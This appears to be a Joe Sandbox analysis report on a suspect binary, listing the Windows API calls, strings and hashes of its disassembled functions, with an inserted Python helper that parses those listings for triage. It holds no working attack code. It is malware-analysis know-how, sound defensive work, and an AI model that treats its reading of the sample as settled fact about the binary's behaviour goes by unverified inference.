                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2632138820-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CursorLoad
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3238433803-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00460B00
• __swprintf.LIBCMT ref: 00460B9E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
• GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
• GetDlgCtrlID.USER32(?), ref: 00460CE6
• GetWindowRect.USER32(?,?), ref: 00460D21
• GetParent.USER32(?), ref: 00460D40
• ScreenToClient.USER32(00000000), ref: 00460D47
• GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
• GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
• String ID: %s%u
• API String ID: 1899580136-679674701
• Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
• Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
• Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
APIs
• CoTaskMemFree.OLE32(?), ref: 0047D6D3
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• StringFromCLSID.OLE32(?,?), ref: 0047D6B5
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• StringFromIID.OLE32(?,?), ref: 0047D7F0
• CoTaskMemFree.OLE32(?), ref: 0047D80A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: FreeFromStringTask_wcslen$_wcscpy
• String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
• API String ID: 2485709727-934586222
• Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
• Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
• Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
• String ID: HH
• API String ID: 3381189665-2761332787
• Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
• Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
• Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
APIs
• GetDC.USER32(00000000), ref: 00434585
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
• CreateCompatibleDC.GDI32(00000000), ref: 0043459B
• SelectObject.GDI32(00000000,?), ref: 004345A9
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
• String ID: (
• API String ID: 3300687185-3887548279
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
• __swprintf.LIBCMT ref: 0045E4D9
• _printf.LIBCMT ref: 0045E595
• _printf.LIBCMT ref: 0045E5B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: LoadString_printf$__swprintf_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
• API String ID: 3590180749-2894483878
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 0046F911
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
• SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
• DeleteObject.GDI32(?), ref: 0046F950
• DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
• SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
• DeleteObject.GDI32(?), ref: 0046F9CF
• DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
• ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
• DestroyIcon.USER32(?), ref: 0046FA4F
• SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
• DeleteObject.GDI32(?), ref: 0046FA68
• DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3412594756-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4013263488-4113822522
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
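The APIs and String ID lines are the part of each function entry an analyst actually reads, and the report prints them in a fixed shape: a bullet, an optional "Part of subcall function <addr>:" prefix, Api.MODULE with an optional argument list, then "ref: <call-site address>"; the strings a function references are joined with "$". The following helper is an added example, not code from Joe Sandbox or from this report, that parses those lines into structured records so the same check can be run across every entry in the report instead of by eye. The sample input is the mciSendStringW entry directly above, copied in the report's line format and embedded here; the record and function names are my own.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: the APIs block of the entry above, copied in the
# shape Joe Sandbox prints it (bullet, optional "Part of subcall function"
# prefix, Api.MODULE(args) or Api.MODULE with no argument list, "ref: <addr>").
SAMPLE_APIS = """\
• Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
• Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
• GetDriveTypeW.KERNEL32 ref: 0045DA30
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
• Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
"""

# Constructed sample input: the "String ID" line of the same entry. The report
# joins referenced strings with "$"; whitespace inside a piece is significant
# ("open " is a fragment the code concatenates onto another string).
SAMPLE_STRING_ID = ("• String ID: type cdaudio alias cd wait$ wait$close$"
                    "close cd wait$closed$open$open $set cd door")

API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                     # raw argument tokens; "?" means unresolved
    ref: int                       # address of the call site
    subcall: Optional[int] = None  # callee address for "Part of subcall function" lines


def parse_api_lines(text: str) -> list:
    """Parse the bullet lines of one APIs block into ApiCall records, in listed order."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = API_LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def direct_call_sequence(calls: list) -> list:
    """API names the function itself calls, in order. Subcall lines belong to
    the callee (the report lists them under the caller for context) and are skipped."""
    return [c.api for c in calls if c.subcall is None]


def count_by_module(calls: list) -> dict:
    """How many listed calls land in each module (including subcall lines)."""
    counts = {}
    for c in calls:
        counts[c.module] = counts.get(c.module, 0) + 1
    return counts


def split_string_id(line: str) -> list:
    """Split a 'String ID:' line into its individual strings, preserving the
    spaces inside each piece. An empty String ID yields []."""
    _, _, body = line.partition("String ID:")
    if body.startswith(" "):      # the single separator space after the colon
        body = body[1:]
    return body.split("$") if body else []


def summarize_entry(api_text: str, string_id_line: str) -> dict:
    """One triage record per function entry: call sites, call order, modules, strings."""
    calls = parse_api_lines(api_text)
    return {
        "call_sites": [hex(c.ref) for c in calls if c.subcall is None],
        "sequence": direct_call_sequence(calls),
        "modules": count_by_module(calls),
        "strings": split_string_id(string_id_line),
    }


if __name__ == "__main__":
    for key, value in summarize_entry(SAMPLE_APIS, SAMPLE_STRING_ID).items():
        print(f"{key}: {value}")
```

On the entry above this yields the direct sequence GetDriveTypeW, mciSendStringW, mciSendStringW, mciSendStringW and the MCI fragments "type cdaudio alias cd wait", "set cd door", "open", "closed", "close cd wait": the function drives the CD tray through MCI command strings. That is generic runtime functionality, not stealer behaviour by itself; the point of parsing is to run the same extraction over all entries in the report, for instance to pull out the CreateFileW, ReadFile, CreateStreamOnHGlobal, OleLoadPicture, SendMessageW chain listed further down, where the 00000172 argument to SendMessageW is STM_SETIMAGE.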
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
• String ID:
• API String ID: 228034949-0
• Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
• Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
• Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
• Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
• GlobalLock.KERNEL32(00000000), ref: 00433523
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
• GlobalUnlock.KERNEL32(00000000), ref: 0043353A
• CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
• GlobalFree.KERNEL32(00000000), ref: 0043357B
• GetObjectW.GDI32(?,00000018,?), ref: 004335A6
• CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
• DeleteObject.GDI32(?), ref: 00433603
• SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3969911579-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00445A8D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00445AC4
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00445AE0
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll$ClassMessageNameParentSend
